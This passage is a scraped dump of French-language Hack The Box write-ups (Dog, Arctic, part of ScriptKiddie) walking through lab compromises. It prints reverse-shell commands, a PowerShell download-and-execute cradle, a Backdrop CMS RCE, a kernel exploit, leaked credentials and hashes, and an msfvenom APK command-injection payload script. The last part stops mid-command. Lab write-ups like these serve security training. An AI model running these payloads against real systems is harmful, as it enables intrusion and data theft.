open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEJsqBRTZaxqvLcuvWuqOclXU1uxwUJv98W1TfLTgTYqIBzWAqQR7Y6fXBOUS6FQ9xctARWGM3w3AeDw+MW0j+iH83gc9J4mTFTBP8bXMgRqS2MtoeNgKWozPoy6wQjuRSUammW772o8rsU2lFPq3fJCoPgiC7dR4qmrWvgp5TV8GuExl7WugH6/cTGrjoqezALwRlKsDgmAl6TkAaWbCC1rQ244m58ymadXaAx5I5NuvCxbVtw32/eEuyqu+bnW8V2SdTTtLCNOe1Tq0XJz3mG9rw8oFH+Mqr142h81jKzyPO/YrbqZi2GvOGF+PNxMg+4kWLQ559we+7mLIT7ms0esal5O6GqIVPax0K21+GblcyRBCCNkawzQCObo5rdvtELh0CPRkBkbOPo4CfXwd/DxMnijXzhR/lCLlb2bqYUMDxkfeMnmk8HRF+hbVQefbRC/+vWf61o2l0IFEr1IJo3BDtJy5m2IcWCeFX3ufk5Fme8LTzAsk6G9hROXnBZg8= | 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y= | 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu)) | http-git: | 10.10.11.58:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file \u0026#39;description\u0026#39; to name the... |_ Last commit message: todo: customize url aliases. reference:https://docs.backdro... |_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-generator: Backdrop CMS 1 (https://backdropcms.org) | http-robots.txt: 22 disallowed entries | /core/ /profiles/ /README.md /web.config /admin | /comment/reply /filter/tips /node/add /search /user/register | /user/password /user/login /user/logout /?q=admin /?q=comment/reply | /?q=filter/tips /?q=node/add /?q=search /?q=user/password |_/?q=user/register /?q=user/login /?q=user/logout |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Home | Dog Foothold website with .git files | git-dumper On trouve un serveur web avec un dossier .git. On peut donc utiliser git-dumper pour récupérer des fichiers et faire un git log eventullement pour trouver des infos:\nmysql credentials Après analyse des fichiers, on trouve des credentials dans le fichier settings.php :\n\u0026lsquo;mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop\u0026rsquo;\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(kali㉿kali)-[~/htb/Dog] └─$ git-dumper http://10.10.11.58/.git/ ./website ┌──(kali㉿kali)-[~/htb/Dog] └─$ cd website/ ┌──(kali㉿kali)-[~/htb/Dog] └─$ grep -rni \u0026#34;\\$database =\u0026#34; website/settings.php:15:$database = \u0026#39;mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop\u0026#39;; website/core/modules/simpletest/tests/database_test.test:3653: $database = Database::getConnection(); website/core/modules/system/system.admin.inc:2625: $database = $databases[\u0026#39;default\u0026#39;][\u0026#39;default\u0026#39;]; website/core/includes/install.inc:491: $database = $modified_connection_info[\u0026#39;default\u0026#39;][\u0026#39;database\u0026#39;]; website/core/includes/install.inc:796: $database = NULL; website/core/includes/install.core.inc:904: $database = $databases[\u0026#39;default\u0026#39;][\u0026#39;default\u0026#39;]; website/core/includes/install.core.inc:973: $database = isset($databases[\u0026#39;default\u0026#39;][\u0026#39;default\u0026#39;]) ? $databases[\u0026#39;default\u0026#39;][\u0026#39;default\u0026#39;] : array(); website/core/includes/install.core.inc:1022: $database = $form_state[\u0026#39;values\u0026#39;][$driver]; Tiffany \u0026ldquo;tiffany@dog.htb\u0026rdquo;\n1 2 3 4 5 ┌──(kali㉿kali)-[~/htb/Dog/website] └─$ grep -rni \u0026#34;@dog.htb\u0026#34; .git/logs/HEAD:1:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root \u0026lt;dog@dog.htb\u0026gt; 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases .git/logs/refs/heads/master:1:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root \u0026lt;dog@dog.htb\u0026gt; 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:12: \u0026#34;tiffany@dog.htb\u0026#34; Backdrop CMS - Authenticated RCE Grâce au compte administrateur de tiffany, on va pouvoir exploiter une RCE de backdrop CMS v1.27.1 et uploader un fichier shell.php :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ┌──(kali㉿kali)-[~/htb/Dog] └─$ searchsploit backdrop cms --------------------------------------------------------- Exploit Title | Path --------------------------------------------------------- Backdrop CMS 1.20.0 - \u0026#39;Multiple\u0026#39; Cross-Site Request Forgery (CSRF) | php/webapps/50323.html Backdrop CMS 1.23.0 - Stored XSS | php/webapps/51905.txt Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) | php/webapps/52021.py Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) | php/webapps/51597.txt --------------------------------------------------------- Shellcodes: No Results ┌──(kali㉿kali)-[~/htb/Dog] └─$ searchsploit -m php/webapps/52021.py Exploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) URL: https://www.exploit-db.com/exploits/52021 Path: /usr/share/exploitdb/exploits/php/webapps/52021.py Codes: N/A Verified: True File Type: Python script, Unicode text, UTF-8 text executable Copied to: /home/kali/htb/Dog/52021.py ┌──(kali㉿kali)-[~/htb/Dog] └─$ mv 52021.py RCE.py ┌──(kali㉿kali)-[~/htb/Dog] └─$ python3 RCE.py http//dog.htb Backdrop CMS 1.27.1 - Remote Command Execution Exploit Evil module generating... Evil module generated! shell.zip Go to http//dog.htb/admin/modules/install and upload the shell.zip for Manual Installation. Your shell address: http//dog.htb/modules/shell/shell.php Quand on va a l\u0026rsquo;addresse specifier pour installer le module avec le code malicieux, on trouve un message :\nThe Zip PHP extension is not loaded on your server. You will not be able to download any projects using Project Installer until this is fixed. Impossible donc d\u0026rsquo;installer un module .zip comme le propose l\u0026rsquo;exploit. Cependant, on trouve un bouton un peu plus bas : Manual Installation Upload a module Ensuite on met notre zip mais on a: The specified file shell.zip could not be uploaded. Only files with the following extensions are allowed: tar tgz gz bz2. On remplace donc notre .zip par un .tar : ça fonctionne ! Notre code php est bien présent à l\u0026rsquo;addresse spécifié par l\u0026rsquo;exploit python: http//dog.htb/modules/shell/shell.php\nPour obtenir un reverse shell stable facilement, on va uploader directement un code php \u0026lsquo;php-reverse-shell.php\u0026rsquo; provenant de github en modifiant notre ip et port:\n1 2 3 4 5 6 7 8 9 10 11 12 13 ## php-reverse-shell.php ... set_time_limit (0); $VERSION = \u0026#34;1.0\u0026#34;; $ip = \u0026#39;10.10.14.10\u0026#39;; // CHANGE THIS $port = 1337; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = \u0026#39;uname -a; w; id; /bin/sh -i\u0026#39;; $daemon = 0; $debug = 0; ... On obtient un shell en tant que www-data :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ## Firefox http://dog.htb/modules/shell/shell.php ----------------------------------------- ┌──(kali㉿kali)-[~/htb/Dog] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.11.58] 46688 Linux dog 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux 14:57:07 up 17:27, 0 users, load average: 0.05, 0.03, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can\u0026#39;t access tty; job control turned off $ whoami www-data $ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@dog:/$ export TERM=xterm export TERM=xterm www-data@dog:/$ ^Z zsh: suspended nc -lnvp 1337 ┌──(kali㉿kali)-[~/htb/Dog] └─$ stty raw -echo; fg [1] + continued nc -lnvp 1337 www-data@dog:/$ whoami www-data www-data -\u0026gt; johncusack Mysql connection On peut se connecter a la base de données mysql rapidement avec les credentials trouvés précédemment:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 www-data@dog:/$ mysql -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \\g. Your MySQL connection id is 12917 Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu) Copyright (c) 2000, 2025, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type \u0026#39;help;\u0026#39; or \u0026#39;\\h\u0026#39; for help. Type \u0026#39;\\c\u0026#39; to clear the current input statement. mysql\u0026gt; use backdrop; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql\u0026gt; select name,pass,mail from users; +-------------------+---------------------------------------------------------+----------------------------+ | name | pass | mail | +-------------------+---------------------------------------------------------+----------------------------+ | | | | | jPAdminB | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | jPAdminB@dog.htb | | jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | jobert@dog.htb | | dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | dogBackDroopSystem@dog.htb | | john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | john@dog.htb | | morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | morris@dog.htb | | axel | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | axel@dog.htb | | rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT | rosa@dog.htb | | tiffany | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | tiffany@dog.htb | +-------------------+---------------------------------------------------------+----------------------------+ 9 rows in set (0.00 sec) john, jobert - hashcat bruteforce passwords On a les users suivant pouvant avoir un shell sur le serveur :\n1 2 3 4 www-data@dog:/$ cat /etc/passwd | grep sh$ root:x:0:0:root:/root:/bin/bash jobert:x:1000:1000:jobert:/home/jobert:/bin/bash johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash On va donc tenter de cracker en priorité les mots de passe de jobert et de john, à l\u0026rsquo;aide de hashcat:\n1 2 $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. Aucun résultat avec rockyou ! On abandonne cette piste (Meme pour les autres hachage)\njohncusack En essayant toujours le meme mot de passe: BackDropJ2024DS2024 avec john, ça fonctionne ! On peut ensuite se connecter en ssh avec cet utilisateur sur la machine linux :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ┌──(kali㉿kali)-[~/htb/Dog] └─$ ssh johncusack@dog.htb The authenticity of host \u0026#39;dog.htb (10.10.11.58)\u0026#39; can\u0026#39;t be established. ED25519 key fingerprint is SHA256:M3A+wMdtWP0tBPvp9OcRf6sPPmPmjfgNphodr912r1o. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added \u0026#39;dog.htb\u0026#39; (ED25519) to the list of known hosts. johncusack@dog.htb\u0026#39;s password: \u0026lt;------------ BackDropJ2024DS2024 Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64) ... ... Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Mar 9 08:36:06 2025 from 10.10.14.2 johncusack@dog:~$ whoami johncusack johncusack@dog:~$ cat user.txt cb5b.....1388 Privilege escalation johncusack : \u0026lsquo;bee\u0026rsquo; as superuser On peut executer le binaire \u0026ldquo;/usr/local/bin/bee\u0026rdquo; en tant que super utilisateur :\n1 2 3 4 5 6 7 johncusack@dog:~$ sudo -l [sudo] password for johncusack: Matching Defaults entries for johncusack on dog: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User johncusack may run the following commands on dog: (ALL : ALL) /usr/local/bin/bee On regarde les options pour la commande bee :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 johncusack@dog:/var/www/html$ sudo bee 🐝 Bee Usage: bee [global-options] \u0026lt;command\u0026gt; [options] [arguments] Global Options: --root Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory. --site Specify the directory name or URL of the Backdrop site to use (as defined in \u0026#39;sites.php\u0026#39;). If not set, will try to find the Backdrop site automatically based on the current directory. .... .... ADVANCED eval ev, php-eval Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop. php-script scr Execute an arbitrary PHP file after bootstrapping Backdrop. En regardant de plus près, on trouve deux options intéressantes :\neval php-script On essaye d\u0026rsquo;abord php-script qui semble prendre un fichier php en parametre et l\u0026rsquo;execute :\n1 2 3 johncusack@dog:/var/www/html$ sudo bee php-script ✘ Argument \u0026#39;file\u0026#39; is required. On essaye alors de créer un revershell php \u0026lsquo;shell.php\u0026rsquo; et de le passer en parametre:\n1 2 3 4 5 johncusack@dog:~/.temp$ ls shell.php johncusack@dog:~/.temp$ sudo bee php-script shell.php ✘ The required bootstrap level for \u0026#39;php-script\u0026#39; is not ready. On reçoit un message d\u0026rsquo;erreur. Après reflexion, l\u0026rsquo;idée me vient d\u0026rsquo;executer un fichier php dans le dossier où se trouve les fichiers php du web server. Peut être que cela peuvent etre modifié et executé ensuite ?\n1 2 3 4 5 6 7 8 johncusack@dog:/var/www/html$ sudo bee php-script index.php ℹ Notice: Constant BACKDROP_ROOT already defined in include() (line 17 of /var/www/html/index.php). ⚠ Warning: Cannot modify header information - headers already sent by (output started at /backdrop_tool/bee/includes/errors.inc:142) in backdrop_goto() (line 867 of /var/www/html/core/includes/common.inc). Après un essais sur le fichier index.php, il n\u0026rsquo;y a plus d\u0026rsquo;erreur ! Il semble bien executer le code dans ce fichier. On peut alors:\nmodifier un fichier tel que index.php et executer un reverse shell créer un nouveau fichier php avec un code reverse shell Cependant, nous n\u0026rsquo;avons pas les droits pour modifier/creer des fichiers. Seulement www-data peut le faire. Nous avons accès au compte www-data donc pas de problème. On crée un fichier s.php avec un code pour ouvrir un reverse shell, et ça fonctionne :\n1 2 3 4 5 6 7 8 9 johncusack@dog:/var/www/html$ sudo bee php-script s.php johncusack@dog:/var/www/html$ ℹ Notice: Undefined variable: daemon in printit() (line 184 of /var/www/html/s.php). Successfully opened reverse shell to 10.10.14.10:1338 ℹ Notice: Undefined variable: daemon in printit() (line 184 of /var/www/html/s.php). On obtient bien un shell en tant que root :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ┌──(kali㉿kali)-[~/htb/Dog] └─$ nc -lnvp 1338 listening on [any] 1338 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.11.58] 39820 Linux dog 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux 15:29:16 up 18:00, 2 users, load average: 0.02, 0.05, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT johncusa pts/2 10.10.14.10 15:19 4.00s 0.16s 0.16s -bash johncusa pts/3 10.10.16.2 15:21 35.00s 0.05s 0.05s -bash uid=0(root) gid=0(root) groups=0(root) /bin/sh: 0: can\u0026#39;t access tty; job control turned off ## whoami root ## cat /root/root.txt 5a2f.....adc2 ","date":"2025-03-09T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/dog-htb/","title":"HTB | Dog"},{"content":" Machine name OS IP Difficulty Arctic Windows 10.10.10.11 Easy System Infos 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 Host Name: ARCTIC OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 55041-507-9857321-84451 Original Install Date: 22/3/2017, 11:09:45 ?? System Boot Time: 9/3/2025, 4:20:09 ?? System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 Windows Directory: C:\\Windows System Directory: C:\\Windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 6.143 MB Available Physical Memory: 4.964 MB Virtual Memory: Max Size: 12.285 MB Virtual Memory: Available: 11.080 MB Virtual Memory: In Use: 1.205 MB Page File Location(s): C:\\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.11 Enumeration nmap 1 2 $ nmap -sC -sV -An -p- 10.10.10.11 HTTP -\u0026gt; Port 8500 Foothold Adobe Coldfusion 8 On accède à une page de connexion pour les administrateurs du serveur : http://10.10.10.11:8500/CFIDE/administrator/enter.cfm\nOn note qu\u0026rsquo;il s\u0026rsquo;agit du service Adobe Coldfusion 8. On trouve directement un poc en python sur searchsploit et on obtient un shell sur la machine :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 $ python3 exploit.py ... Printing some information for debugging... lhost: 10.10.14.10 lport: 1337 rhost: 10.10.10.11 rport: 8500 payload: 097d871e33a84bc8a3ed6002724b19ee.jsp Deleting the payload... Listening for connection... Executing the payload... listening on [any] 1337 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49235 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\\ColdFusion8\\runtime\\bin\u0026gt; whoami arctic\\tolis Stabilize powershell Dans un premier temps, il a fallu obtenir un meilleur cmd.exe car il n\u0026rsquo;était pas stable du tout. Impossible d\u0026rsquo;obtenir directement un powershell (stable ou non). Ensuite, avec ce nouveau cmd.exe stable (grace a un serveur smbshare et un nc.exe), j\u0026rsquo;ai pu utiliser un nouveau revershell pour obtenir un powershell stable a l\u0026rsquo;aide du repo de nishang et de Invoke-TcpXXX.ps1.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 ┌──(kali㉿kali)-[~/htb/Arctic] └─$ impacket-smbserver share . Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.10.11,49414) [*] AUTHENTICATE_MESSAGE (ARCTIC\\tolis,ARCTIC) [*] User ARCTIC\\tolis authenticated successfully [*] tolis::ARCTIC:aaaaaaaaaaaaaaaa:c542f5a7a35d08fb97440dcae060b508:01010000000000000079e8fa958fdb0199d3a7cce7b544db00000000010010004a00550051007500770064006b004300030010004a00550051007500770064006b00430002001000500073005400480047006e005800440004001000500073005400480047006e0058004400070008000079e8fa958fdb01060004000200000008003000300000000000000000000000003000006d512dfe482ef201bb28a406e85c0fc4005f2cfd87b665b2061df41978469e2b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003000000000000000000000000000 [*] Disconnecting Share(1:IPC$) [*] Disconnecting Share(2:SHARE) ------------INITIAL FOOTHOLD CMD.EXE------------- C:\\ColdFusion8\\runtime\\bin\u0026gt;\\\\10.10.14.10\\share\\nc.exe -e cmd.exe 10.10.14.10 4444 \\\\10.10.14.10\\share\\nc.exe -e cmd.exe 10.10.14.10 4444 -----------NEW CMD.EXE ON PORT 4444----------------- ┌──(kali㉿kali)-[~/htb/Arctic] └─$ nc -lnvp 4444 listening on [any] 4444 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49435 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\\ColdFusion8\\runtime\\bin\u0026gt;\\\\10.10.14.10\\share\\nc.exe -e powershell.exe 10.10.14.10 5555 \\\\10.10.14.10\\share\\nc.exe -e powershell.exe 10.10.14.10 5555 C:\\ColdFusion8\\runtime\\bin\u0026gt;powershell.exe IEX(New-Object Net.WebClient).downloadString(\u0026#39;http://10.10.14.10:8888/shell.ps1\u0026#39;) powershell.exe IEX(New-Object Net.WebClient).downloadString(\u0026#39;http://10.10.14.10:8888/shell.ps1\u0026#39;) -----------POWERSHELL ON PORT 1338------------------ ┌──(kali㉿kali)-[~/htb/Arctic] └─$ nc -lnvp 1338 listening on [any] 1338 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49451 Windows PowerShell running as user tolis on ARCTIC Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\\ColdFusion8\\runtime\\bin\u0026gt;whoami arctic\\tolis Privilege Escalation Kernel Exploit : Chimichurri.exe Searching for elevation privilege CVE using \u0026ldquo;wes\u0026rdquo; windows-exploits-suggester.\n1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~/htb/Arctic] └─$ wes ./arctic_systeminfo | grep -I \u0026#39;Elevation of Privilege\u0026#39; -B7 | grep CVE-2010-2554 -A7 -B2 Date: 20100810 CVE: CVE-2010-2554 KB: KB982799 Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege -- On trouve un github avec un exe deja compilé pour faire l\u0026rsquo;exploit:\nhttps://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 PS C:\\Users\\tolis\u0026gt; .\\Chimichurri.exe /Chimichurri/--\u0026gt;This exploit gives you a Local System shell \u0026lt;BR\u0026gt;/Chimichurri/--\u0026gt;Usage: Chimichurri.exe ipaddress port \u0026lt;BR\u0026gt; PS C:\\Users\\tolis\u0026gt; .\\Chimichurri.exe 10.10.14.10 7676 --------------------- ┌──(kali㉿kali)-[~/htb/Arctic] └─$ nc -lnvp 7676 listening on [any] 7676 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 50748 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\\Users\\tolis\u0026gt;whoami whoami nt authority\\system C:\\Users\\tolis\u0026gt;cd ../Administrator\\Desktop cd ../Administrator\\Desktop C:\\Users\\Administrator\\Desktop\u0026gt;type root.txt type root.txt 8980.....ffb6 ","date":"2025-03-08T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/arctic-htb/","title":"HTB | Arctic"},{"content":" Machine name OS IP Difficulty ScriptKiddie Linux 10.10.10.226 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(kali㉿kali)-[~/htb/ScriptKiddie] └─$ nmap -sC -sV -An -T4 -vvv 10.10.10.226 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/YB1g/YHwZNvTzj8lysM+SzX6dZzRbfF24y3ywkhai4pViGEwUklIPkEvuLSGH97NJ4y8r9uUXzyoq3iuVJ/vGXiFlPCrg+QDp7UnwANBmDqbVLucKdor+JkWHJJ1h3ftpEHgol54tj+6J7ftmaOR29Iwg+FKtcyNG6PY434cfA0Pwshw6kKgFa+HWljNl+41H3WVua4QItPmrh+CrSoaA5kCe0FAP3c2uHcv2JyDjgCQxmN1GoLtlAsEznHlHI1wycNZGcHDnqxEmovPTN4qisOKEbYfy2mu1Eqq3Phv8UfybV8c60wUqGtClj3YOO1apDZKEe8eZZqy5eXU8mIO+uXcp5zxJ/Wrgng7WTguXGzQJiBHSFq52fHFvIYSuJOYEusLWkGhiyvITYLWZgnNL+qAVxZtP80ZTq+lm4cJHJZKl0OYsmqO0LjlMOMTPFyA+W2IOgAmnM+miSmSZ6n6pnSA+LE2Pj01egIhHw5+duAYxUHYOnKLVak1WWk/C68= | 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJA31QhiIbYQMUwn/n3+qcrLiiJpYIia8HdgtwkI8JkCDm2n+j6dB3u5I17IOPXE7n5iPiW9tPF3Nb0aXmVJmlo= | 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOWjCdxetuUPIPnEGrowvR7qRAR7nuhUbfFraZFmbIr4 5000/tcp open http syn-ack ttl 63 Werkzeug httpd 0.16.1 (Python 3.8.5) | http-methods: |_ Supported Methods: GET OPTIONS HEAD POST |_http-server-header: Werkzeug/0.16.1 Python/3.8.5 |_http-title: k1d\u0026#39;5 h4ck3r t00l5 Foothold msfvenom - apk template injection On a accès a une page web sur le port 5000 où plusieurs commandes peuvent etre executés, on a notamment:\nvenom it up - gen rev tcp meterpreter bins qui nous permet de generer avec msfvenom un reverse meterpreter facilement pour android, linux, windows.\nOn a le droit de mettre un fichier template. Après une recherche sur internet et sur searchsploit, on observe une vuln dans l\u0026rsquo;outil msfvenom.\nSi on execute msfvenom pour le meterpreter android, en passant un apk vérolé en template(-x), on a une RCE :\nmsfvenom -x /tmp/tmp9ep2m3p9/poc.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 # APK TEMPLATE FILE CREATION PYTHON SCRIPT #!/usr/bin/env python3 import subprocess import tempfile import os from base64 import b32encode # Change me payload = \u0026#39;sh -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.19/1337 0\u0026gt;\u0026amp;1\u0026#39; # b32encode to avoid badchars (keytool is picky) # thanks to @fdellwing for noticing that base64 can sometimes break keytool # \u0026lt;https://github.com/justinsteven/advisories/issues/2\u0026gt; payload_b32 = b32encode(payload.encode()).decode() dname = f\u0026#34;CN=\u0026#39;|echo {payload_b32} | base32 -d | sh #\u0026#34; ... -------------------------------------- $ python3 poc.py [+] Manufacturing evil apkfile Payload: sh -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.19/1337 0\u0026gt;\u0026amp;1 -dname: CN=\u0026#39;|echo ONUCALLJEA7CMIBPMRSXML3UMNYC6MJQFYYTALRRGQXDCOJPGEZTGNZAGA7CMMI= | base32 -d | sh # adding: empty (stored 0%) Génération d\u0026#39;une paire de clés RSA de 2 048 bits et d\u0026#39;un certificat auto-signé (SHA256withRSA) d\u0026#39;une validité de 90 jours pour : CN=\u0026#34;\u0026#39;|echo ONUCALLJEA7CMIBPMRSXML3UMNYC6MJQFYYTALRRGQXDCOJPGEZTGNZAGA7CMMI= | base32 -d | sh #\u0026#34; jar signed. Warning: The signer\u0026#39;s certificate is self-signed. The SHA1 algorithm specified for the -digestalg option is considered a security risk and is disabled. The SHA1withRSA algorithm specified for the -sigalg option is considered a security risk and is disabled. POSIX file permission and/or symlink attributes detected. These attributes are ignored when signing and are not protected by the signature. [+] Done! apkfile is at /tmp/tmp9ep2m3p9/poc.apk Do: msfvenom -x /tmp/tmp9ep2m3p9/poc.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o 